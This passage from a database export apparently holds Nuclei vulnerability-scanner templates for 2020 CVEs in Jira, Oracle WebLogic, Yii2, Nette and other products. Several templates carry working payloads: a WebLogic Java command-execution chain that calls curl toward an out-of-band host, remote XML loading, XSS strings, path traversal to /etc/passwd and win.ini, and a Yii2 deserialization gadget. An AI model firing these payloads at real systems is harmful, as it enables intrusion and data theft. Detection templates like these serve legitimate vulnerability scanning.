"time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308190" }, "name": "CVE-2020-14179.yaml", "content": "id: CVE-2020-14179\n\ninfo:\n name: Atlassian Jira Server/Data Center <8.5.8/8.6.0 - 8.11.1 - Information Disclosure\n author: x1m_martijn\n severity: medium\n description: Atlassian Jira Server and Data Center before 8.5.8 and 8.6.0 through 8.11.1 are susceptible to information disclosure via the /secure/QueryComponent!Default.jspa endpoint. An attacker can view custom field names and custom SLA names.\n impact: |\n An attacker can exploit this vulnerability to gain access to sensitive information, potentially leading to further attacks.\n remediation: |\n Upgrade Atlassian Jira Server/Data Center to a version higher than 8.11.1 to mitigate the vulnerability.\n reference:\n - https://jira.atlassian.com/browse/JRASERVER-71536\n - https://nvd.nist.gov/vuln/detail/CVE-2020-14179\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n cvss-score: 5.3\n cve-id: CVE-2020-14179\n epss-score: 0.00927\n epss-percentile: 0.81211\n cpe: cpe:2.3:a:atlassian:jira_data_center:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: atlassian\n product: jira_data_center\n shodan-query: http.component:\"Atlassian Jira\"\n tags: cve,cve2020,atlassian,jira,exposure,disclosure\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/secure/QueryComponent!Default.jspa\"\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - '{\"searchers\":'\n - '\"groups\":'\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502210096f095a7e5b1890aec761ba02f30068376572d358c7b7f2377be52b71bafe88c02203feeb9b688c168e5c644f45bc6e2e4031cd7a2f541d50bf68d50e45bb9ebd6e4:922c64590222798bb761d5b6d8e72950", "hash": "6259d2916640ac64fe06d8e48b54045c", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308191" }, "name": "CVE-2020-14181.yaml", "content": "id: CVE-2020-14181\n\ninfo:\n name: Jira Server and Data Center - Information Disclosure\n author: bjhulst\n severity: medium\n description: Jira Server and Data Center is susceptible to information disclosure. An attacker can enumerate users via the /ViewUserHover.jspa endpoint and thus potentially access sensitive information, modify data, and/or execute unauthorized operations. Affected versions are before version 7.13.6, from version 8.0.0 before 8.5.7, and from version 8.6.0 before 8.12.0.\n impact: |\n An attacker can gain access to sensitive information, potentially leading to further attacks.\n remediation: |\n Apply the necessary patches or updates provided by Atlassian to fix the vulnerability.\n reference:\n - https://jira.atlassian.com/browse/JRASERVER-71560\n - http://packetstormsecurity.com/files/161730/Atlassian-JIRA-8.11.1-User-Enumeration.html\n - https://nvd.nist.gov/vuln/detail/CVE-2020-14181\n - https://github.com/H4ckTh3W0r1d/Goby_POC\n - https://github.com/Rival420/CVE-2020-14181\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n cvss-score: 5.3\n cve-id: CVE-2020-14181\n cwe-id: CWE-200\n epss-score: 0.95919\n epss-percentile: 0.99412\n cpe: cpe:2.3:a:atlassian:data_center:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: atlassian\n product: data_center\n shodan-query: http.component:\"Atlassian Jira\"\n tags: cve,cve2020,atlassian,jira,packetstorm\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/secure/ViewUserHover.jspa'\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - 'user-hover-details'\n - 'content=\"JIRA\"'\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502204aa72378f1d38af3a56bbb872653fe90f1d82c08a7a5a4c2599987f2b07a3a9d022100ad34ea3f11b966b88af4d8f227f8e9b46f7032332c327e80e59e9cd963e2406e:922c64590222798bb761d5b6d8e72950", "hash": "0ff7dad1baa24ead9b0021070e663760", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308192" }, "name": "CVE-2020-14408.yaml", "content": "id: CVE-2020-14408\n\ninfo:\n name: Agentejo Cockpit 0.10.2 - Cross-Site Scripting\n author: edoardottt\n severity: medium\n description: Agentejo Cockpit 0.10.2 contains a reflected cross-site scripting vulnerability due to insufficient sanitization of the to parameter in the /auth/login route, which allows for injection of arbitrary JavaScript code into a web page's content.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Upgrade to the latest version of Agentejo Cockpit or apply the vendor-provided patch to fix the XSS vulnerability.\n reference:\n - https://github.com/agentejo/cockpit/issues/1310\n - https://nvd.nist.gov/vuln/detail/CVE-2020-14408\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/StarCrossPortal/scalpel\n - https://github.com/anonymous364872/Rapier_Tool\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2020-14408\n cwe-id: CWE-79\n epss-score: 0.00113\n epss-percentile: 0.44682\n cpe: cpe:2.3:a:agentejo:cockpit:0.10.2:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: agentejo\n product: cockpit\n tags: cve2020,cve,cockpit,agentejo,xss,oss\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/auth/login?to=/92874%27;alert(document.domain)//280\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"redirectTo = '/92874';alert(document.domain)//280';\"\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100d9c05fb3baf867f35afbb4c5ecbc371b317d9ad9a8ce6ccb6c7fdbc1f3231cf902207c1160d456c6b712685c5c2f9c8f5a2c8102f6d5ec75ce531f6daa39b39f4bd7:922c64590222798bb761d5b6d8e72950", "hash": "ee03f4db28a7119eff50800934b19e86", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308193" }, "name": "CVE-2020-14413.yaml", "content": "id: CVE-2020-14413\n\ninfo:\n name: NeDi 1.9C - Cross-Site Scripting\n author: pikpikcu\n severity: medium\n description: NeDi 1.9C is vulnerable to cross-site scripting because of an incorrect implementation of sanitize() in inc/libmisc.php. This function attempts to escape the SCRIPT tag from user-controllable values, but can be easily bypassed, as demonstrated by an onerror attribute of an IMG element as a Devices-Config.php?sta= value.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Upgrade to a patched version of NeDi or apply the vendor-supplied patch to mitigate this vulnerability.\n reference:\n - https://gist.github.com/farid007/8db2ab5367ba00e87f9479b32d46fea8\n - https://nvd.nist.gov/vuln/detail/CVE-2020-14413\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/Elsfa7-110/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2020-14413\n cwe-id: CWE-79\n epss-score: 0.00095\n epss-percentile: 0.38971\n cpe: cpe:2.3:a:nedi:nedi:1.9c:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: nedi\n product: nedi\n tags: cve,cve2020,nedi,xss\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/Devices-Config.php?sta=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"\"\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100a17974c94baa6f004137cf8899e0977bd37030e412c83a9d74273c6477095cfe022100ae2ba0fe9043f67069286b217dd44873f67f994fd877249b7dc65282d21d5c70:922c64590222798bb761d5b6d8e72950", "hash": "53af54574c3ff285a61b5f8a59f471a5", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308194" }, "name": "CVE-2020-14750.yaml", "content": "id: CVE-2020-14750\n\ninfo:\n name: Oracle WebLogic Server - Remote Command Execution\n author: princechaddha,DhiyaneshDk\n severity: critical\n description: |\n Oracle WebLogic Server 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0 is susceptible to remote code execution. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised machine without entering necessary credentials. See also CVE-2020-14882, which is addressed in the October 2020 Critical Patch Update.\n impact: |\n Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands with the privileges of the WebLogic server.\n remediation: |\n Apply the latest security patches provided by Oracle to mitigate this vulnerability.\n reference:\n - https://github.com/pprietosanchez/CVE-2020-14750\n - https://www.oracle.com/security-alerts/alert-cve-2020-14750.html\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14750\n - https://nvd.nist.gov/vuln/detail/CVE-2020-14750\n - http://packetstormsecurity.com/files/160143/Oracle-WebLogic-Server-Administration-Console-Handle-Remote-Code-Execution.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-14750\n epss-score: 0.97544\n epss-percentile: 0.99996\n cpe: cpe:2.3:a:oracle:fusion_middleware:10.3.6.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: oracle\n product: fusion_middleware\n shodan-query: http.html:\"Weblogic Application Server\"\n tags: cve2020,cve,rce,oracle,weblogic,unauth,kev,packetstorm\n\nhttp:\n - raw:\n - |\n @timeout: 10s\n POST /console/css/%252e%252e%252fconsole.portal HTTP/1.1\n Host: {{Hostname}}\n Accept: */*\n cmd: curl {{interactsh-url}}\n Content-Type: application/x-www-form-urlencoded\n\n _nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession(\"weblogic.work.ExecuteThread executeThread = (weblogic.work.ExecuteThread) Thread.currentThread();\n weblogic.work.WorkAdapter adapter = executeThread.getCurrentWork();\n java.lang.reflect.Field field = adapter.getClass().getDeclaredField(\"connectionHandler\");\n field.setAccessible(true);\n Object obj = field.get(adapter);\n weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl) obj.getClass().getMethod(\"getServletRequest\").invoke(obj);\n String cmd = req.getHeader(\"cmd\");\n String[] cmds = System.getProperty(\"os.name\").toLowerCase().contains(\"window\") ? new String[]{\"cmd.exe\", \"/c\", cmd} : new String[]{\"/bin/sh\", \"-c\", cmd};\n if (cmd != null) {\n String result = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(cmds).getInputStream()).useDelimiter(\"\\\\A\").next();\n weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl) req.getClass().getMethod(\"getResponse\").invoke(req);\n res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));\n res.getServletOutputStream().flush();\n res.getWriter().write(\"\");\n }executeThread.interrupt();\n \");\n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol # Confirms DNS Interaction\n words:\n - \"dns\"\n\n - type: word\n part: header\n words:\n - \"ADMINCONSOLESESSION=\"\n\n - type: regex\n part: body\n regex:\n - '(.*)'\n# digest: 4b0a0048304602210089aca28d5d41776ea96aa0bb6616121eee0ef6ec762a650669fc5f6e650aab49022100c700af3059d9fd95fe63ddec43493d48232678dc50bc266a2f8cfaa26d4fcc09:922c64590222798bb761d5b6d8e72950", "hash": "2f26b9395187b9295d6f77ded97259b2", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308195" }, "name": "CVE-2020-14864.yaml", "content": "id: CVE-2020-14864\n\ninfo:\n name: Oracle Fusion - Directory Traversal/Local File Inclusion\n author: Ivo Palazzolo (@palaziv)\n severity: high\n description: Oracle Business Intelligence Enterprise Edition 5.5.0.0.0, 12.2.1.3.0, and 12.2.1.4.0 are vulnerable to local file inclusion vulnerabilities via \"getPreviewImage.\"\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to read sensitive files, execute arbitrary code, or gain unauthorized access to the system.\n remediation: |\n Apply the latest security patches and updates provided by Oracle to fix this vulnerability.\n reference:\n - http://packetstormsecurity.com/files/159748/Oracle-Business-Intelligence-Enterprise-Edition-5.5.0.0.0-12.2.1.3.0-12.2.1.4.0-LFI.html\n - https://www.oracle.com/security-alerts/cpuoct2020.html\n - https://nvd.nist.gov/vuln/detail/CVE-2020-14864\n - https://github.com/merlinepedra/nuclei-templates\n - https://github.com/sobinge/nuclei-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2020-14864\n cwe-id: CWE-22\n epss-score: 0.4541\n epss-percentile: 0.97318\n cpe: cpe:2.3:a:oracle:business_intelligence:5.5.0.0.0:*:*:*:enterprise:*:*:*\n metadata:\n max-request: 2\n vendor: oracle\n product: business_intelligence\n tags: cve,cve2020,oracle,lfi,kev,packetstorm\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/analytics/saw.dll?bieehome&startPage=1'\n - '{{BaseURL}}/analytics/saw.dll?getPreviewImage&previewFilePath=/etc/passwd'\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body\n regex:\n - 'root:.*:0:0:'\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450220301c1ccec08f0b8a2313e6ea62b0556adacd5dd33597547f10af2990730050940221009d500c9bbdf08a1cea7b841a5cbd8ffe901e3271ed97a3a489cd5ab76369ba6e:922c64590222798bb761d5b6d8e72950", "hash": "b652b0899deaed2ef808674ce677511f", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308196" }, "name": "CVE-2020-14882.yaml", "content": "id: CVE-2020-14882\n\ninfo:\n name: Oracle Weblogic Server - Remote Command Execution\n author: dwisiswant0\n severity: critical\n description: Oracle WebLogic Server contains an easily exploitable remote command execution vulnerability which allows unauthenticated attackers with network access via HTTP to compromise the server.\n impact: |\n Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands with the privileges of the affected application.\n remediation: |\n Apply the latest security patches provided by Oracle to fix the vulnerability.\n reference:\n - https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbf\n - https://www.oracle.com/security-alerts/cpuoct2020.html\n - https://twitter.com/jas502n/status/1321416053050667009\n - https://youtu.be/JFVDOIL0YtA\n - https://github.com/jas502n/CVE-2020-14882#eg\n - https://nvd.nist.gov/vuln/detail/CVE-2020-14882\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-14882\n epss-score: 0.9739\n epss-percentile: 0.99906\n cpe: cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: oracle\n product: weblogic_server\n tags: cve2020,cve,oracle,rce,weblogic,oast,kev\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/console/images/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext('http://{{interactsh-url}}')\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"ADMINCONSOLESESSION\"\n\n - type: word\n part: interactsh_protocol\n words:\n - \"http\"\n# digest: 4a0a0047304502210095d334a35f712502dc1161437a7636b7816e79ffa45dee8b16943efbfa63e27e022060fcc3b18130248421a20581edc7d0a8925ec9748890b716418f0e3975cddb70:922c64590222798bb761d5b6d8e72950", "hash": "36bcf1ce635b7c8f6abce699b212c967", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308197" }, "name": "CVE-2020-14883.yaml", "content": "id: CVE-2020-14883\n\ninfo:\n name: Oracle Fusion Middleware WebLogic Server Administration Console - Remote Code Execution\n author: pdteam,vicrack\n severity: high\n description: |\n The Oracle Fusion Middleware WebLogic Server admin console in versions 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0 is vulnerable to an easily exploitable vulnerability that allows high privileged attackers with network access via HTTP to compromise Oracle WebLogic Server.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.\n remediation: |\n Apply the necessary patches or updates provided by Oracle to mitigate this vulnerability.\n reference:\n - https://packetstormsecurity.com/files/160143/Oracle-WebLogic-Server-Administration-Console-Handle-Remote-Code-Execution.html\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14883\n - https://www.oracle.com/security-alerts/cpuoct2020.html\n - http://packetstormsecurity.com/files/160143/Oracle-WebLogic-Server-Administration-Console-Handle-Remote-Code-Execution.html\n - https://github.com/1n7erface/PocList\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 7.2\n cve-id: CVE-2020-14883\n epss-score: 0.97498\n epss-percentile: 0.99975\n cpe: cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: oracle\n product: weblogic_server\n shodan-query: title:\"Oracle PeopleSoft Sign-in\"\n tags: cve,cve2020,oracle,rce,weblogic,kev,packetstorm\nvariables:\n str: \"{{randstr}}\"\n revstr: \"{{reverse(str)}}\"\n\nhttp:\n - raw:\n # CMD: String cmd = req.getHeader(\"CMD\");String[] cmds = System.getProperty(\"os.name\").toLowerCase().contains(\"window\") ? new String[]{\"cmd.exe\", \"/c\", cmd} : new String[]{\"/bin/sh\", \"-c\", cmd}; String result = new java.util.Scanner(new java.lang.ProcessBuilder(cmds).start().getInputStream()).useDelimiter(\"\\\\A\").next();\n - |\n POST /console/images/%252e%252e%252fconsole.portal HTTP/1.1\n Host: {{Hostname}}\n Accept-Language: en\n Content-Type: application/x-www-form-urlencoded\n Accept-Encoding: gzip, deflate\n\n test_handle=com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.ExecuteThread currentThread = (weblogic.work.ExecuteThread)Thread.currentThread(); weblogic.work.WorkAdapter adapter = currentThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField(\"connectionHandler\");field.setAccessible(true);Object obj = field.get(adapter);weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl)obj.getClass().getMethod(\"getServletRequest\").invoke(obj); String result = new StringBuilder(\"{{str}}\").reverse().toString(); weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod(\"getResponse\").invoke(req);res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));res.getServletOutputStream().flush(); currentThread.interrupt();')\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - \"ADMINCONSOLESESSION\"\n\n - type: word\n part: body\n words:\n - \"{{revstr}}\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450220201e093d509e8e0c30a242162cc25c66bbca2852bce51d080ac71d69be11f54a022100f450f10b27a270dfab8c3a426da77b84ef41ddae569328908bb2dbd2541fc858:922c64590222798bb761d5b6d8e72950", "hash": "bcfdff182da63468fa8babae9daddd16", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308198" }, "name": "CVE-2020-15050.yaml", "content": "id: CVE-2020-15050\n\ninfo:\n name: Suprema BioStar <2.8.2 - Local File Inclusion\n author: gy741\n severity: high\n description: Suprema BioStar before 2.8.2 Video Extension allows remote attackers can read arbitrary files from the server via local file inclusion.\n impact: |\n An attacker can exploit this vulnerability to access sensitive information, such as configuration files, credentials, or other sensitive data stored on the server.\n remediation: |\n Upgrade Suprema BioStar to version 2.8.2 or later to fix the LFI vulnerability.\n reference:\n - http://packetstormsecurity.com/files/158576/Bio-Star-2.8.2-Local-File-Inclusion.html\n - https://www.supremainc.com/en/support/biostar-2-pakage.asp\n - https://nvd.nist.gov/vuln/detail/CVE-2020-15050\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2020-15050\n cwe-id: CWE-22\n epss-score: 0.55214\n epss-percentile: 0.97597\n cpe: cpe:2.3:a:supremainc:biostar_2:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: supremainc\n product: biostar_2\n tags: cve,cve2020,suprema,biostar2,packetstorm,lfi,supremainc\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/../../../../../../../../../../../../windows/win.ini\"\n\n matchers:\n - type: word\n part: body\n words:\n - \"bit app support\"\n - \"fonts\"\n - \"extensions\"\n condition: and\n# digest: 490a00463044022027582fd4cb0e0721dcad8ad6dedd262cd3be8b49cf72e43e17a2d9945178024a02205c1ba847b18c648f8f13e7cd4e6e20f76079e24b2801869c1f78c3d40cc310ba:922c64590222798bb761d5b6d8e72950", "hash": "5df3b2f31f6c3947c6a6d8f2deb7f772", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308199" }, "name": "CVE-2020-15129.yaml", "content": "id: CVE-2020-15129\n\ninfo:\n name: Traefik - Open Redirect\n author: dwisiswant0\n severity: medium\n description: Traefik before 1.7.26, 2.2.8, and 2.3.0-rc3 contains an open redirect vulnerability in the X-Forwarded-Prefix header. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n impact: |\n An attacker can manipulate the redirect URL and trick users into visiting malicious websites.\n remediation: |\n Apply the vendor-provided patch or upgrade to a non-vulnerable version of Traefik.\n reference:\n - https://securitylab.github.com/advisories/GHSL-2020-140-Containous-Traefik\n - https://github.com/containous/traefik/releases/tag/v2.2.8\n - https://github.com/containous/traefik/pull/7109\n - https://github.com/containous/traefik/security/advisories/GHSA-6qq8-5wq3-86rp\n - https://nvd.nist.gov/vuln/detail/CVE-2020-15129\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 4.7\n cve-id: CVE-2020-15129\n cwe-id: CWE-601\n epss-score: 0.00701\n epss-percentile: 0.7816\n cpe: cpe:2.3:a:traefik:traefik:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: traefik\n product: traefik\n tags: cve,cve2020,traefik,redirect\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\"\n\n headers:\n X-Forwarded-Prefix: \"https://foo.nl\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"Found\"\n\n - type: status\n status:\n - 302\n# digest: 4b0a00483046022100c07d30a11232f3e470a77e9b15505d72e8fc22a911ac0d5c2acb28c4edf0400c022100fd575518d252dd3b4ab85b454ff6dac82e4164a2ce65d90dbf7777e8baafbcd3:922c64590222798bb761d5b6d8e72950", "hash": "f539fb25952921757bce7a783dfa8521", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30819a" }, "name": "CVE-2020-15148.yaml", "content": "id: CVE-2020-15148\n\ninfo:\n name: Yii 2 < 2.0.38 - Remote Code Execution\n author: pikpikcu\n severity: critical\n description: Yii 2 (yiisoft/yii2) before version 2.0.38 is vulnerable to remote code execution if the application calls `unserialize()` on arbitrary user input.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.\n remediation: Upgrade to version 2.0.38 or later. A possible workaround without upgrading is available in the linked advisory.\n reference:\n - https://blog.csdn.net/xuandao_ahfengren/article/details/111259943\n - https://github.com/nosafer/nosafer.github.io/blob/227a05f5eff69d32a027f15d6106c6d735124659/docs/Web%E5%AE%89%E5%85%A8/Yii2/%EF%BC%88CVE-2020-15148%EF%BC%89Yii2%E6%A1%86%E6%9E%B6%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E.md\n - https://github.com/yiisoft/yii2/commit/9abccb96d7c5ddb569f92d1a748f50ee9b3e2b99\n - https://github.com/yiisoft/yii2/security/advisories/GHSA-699q-wcff-g9mj\n - https://github.com/20142995/sectool\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\n cvss-score: 10\n cve-id: CVE-2020-15148\n cwe-id: CWE-502\n epss-score: 0.02081\n epss-percentile: 0.88831\n cpe: cpe:2.3:a:yiiframework:yii:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: yiiframework\n product: yii\n tags: cve,cve2020,rce,yii,yiiframework\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?r=test/sss&data=TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNToiRmFrZXJcR2VuZXJhdG9yIjoxOntzOjEzOiIAKgBmb3JtYXR0ZXJzIjthOjE6e3M6NToiY2xvc2UiO2E6Mjp7aTowO086MjE6InlpaVxyZXN0XENyZWF0ZUFjdGlvbiI6Mjp7czoxMToiY2hlY2tBY2Nlc3MiO3M6Njoic3lzdGVtIjtzOjI6ImlkIjtzOjY6ImxzIC1hbCI7fWk6MTtzOjM6InJ1biI7fX19fQ==\"\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \"total\"\n - \"An internal server error occurred.\"\n condition: and\n\n - type: status\n status:\n - 500\n# digest: 4a0a00473045022072e95910e14d9ff1be082249e18d6eea72399f1c598e54a6ab12d28549385947022100820179b216116490ccb55a2625b7ae18f47362e1b8e8ec0b6b9f62583b5165a2:922c64590222798bb761d5b6d8e72950", "hash": "84c525b09d778872a689fe4ab5f6dc23", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30819b" }, "name": "CVE-2020-15227.yaml", "content": "id: CVE-2020-15227\n\ninfo:\n name: Nette Framework - Remote Code Execution\n author: becivells\n severity: critical\n description: Nette Framework versions before 2.0.19, 2.1.13, 2.2.10, 2.3.14, 2.4.16, and 3.0.6 are vulnerable to a code injection attack via specially formed parameters being passed to a URL. Nette is a PHP/Composer MVC Framework.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.\n remediation: |\n Apply the latest security patches provided by the Nette Framework to fix the deserialization vulnerability.\n reference:\n - https://github.com/nette/application/security/advisories/GHSA-8gv3-3j7f-wg94\n - https://github.com/Mr-xn/Penetration_Testing_POC/blob/02546075f378a9effeb6426fc17beb66b6d5c8ee/books/Nette%E6%A1%86%E6%9E%B6%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C(CVE-2020-15227).md\n - https://nvd.nist.gov/vuln/detail/CVE-2020-15227\n - https://lists.debian.org/debian-lts-announce/2021/04/msg00003.html\n - https://packagist.org/packages/nette/application\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2020-15227\n cwe-id: CWE-94,CWE-74\n epss-score: 0.97285\n epss-percentile: 0.99849\n cpe: cpe:2.3:a:nette:application:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: nette\n product: application\n fofa-query: app=\"nette-Framework\"\n tags: cve2020,cve,nette,rce\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/nette.micro/?callback=phpcredits\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"PHP Credits\"\n\n - type: word\n part: header\n words:\n - \"Nette Framework\"\n# digest: 4b0a00483046022100ac87b598c9067d033995e435c1dcfe2b0a70b19bfcf75c66a3f4d747c6eeeccf022100f651a9eeb8c2b466377b7f3e42ef74086dbc33dbe6c116e69b13f39f71622087:922c64590222798bb761d5b6d8e72950", "hash": "93a438f17f7b955b4c805fc6d61926af", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30819c" }, "name": "CVE-2020-15500.yaml", "content": "id: CVE-2020-15500\n\ninfo:\n name: TileServer GL <=3.0.0 - Cross-Site Scripting\n author: Akash.C\n severity: medium\n description: TileServer GL through 3.0.0 is vulnerable to reflected cross-site scripting via server.js because the content of the key GET parameter is reflected unsanitized in an HTTP response for the application's main page.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.\n remediation: |\n Upgrade TileServer GL to a version higher than 3.0.0 or apply the vendor-provided patch to fix the XSS vulnerability.\n reference:\n - https://github.com/maptiler/tileserver-gl/issues/461\n - http://packetstormsecurity.com/files/162193/Tileserver-gl-3.0.0-Cross-Site-Scripting.html\n - https://nvd.nist.gov/vuln/detail/CVE-2020-15500\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2020-15500\n cwe-id: CWE-79\n epss-score: 0.0021\n epss-percentile: 0.58865\n cpe: cpe:2.3:a:tileserver:tileservergl:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: tileserver\n product: tileservergl\n tags: cve,cve2020,xss,tileserver,packetstorm\n\nhttp:\n - method: GET\n path:\n - 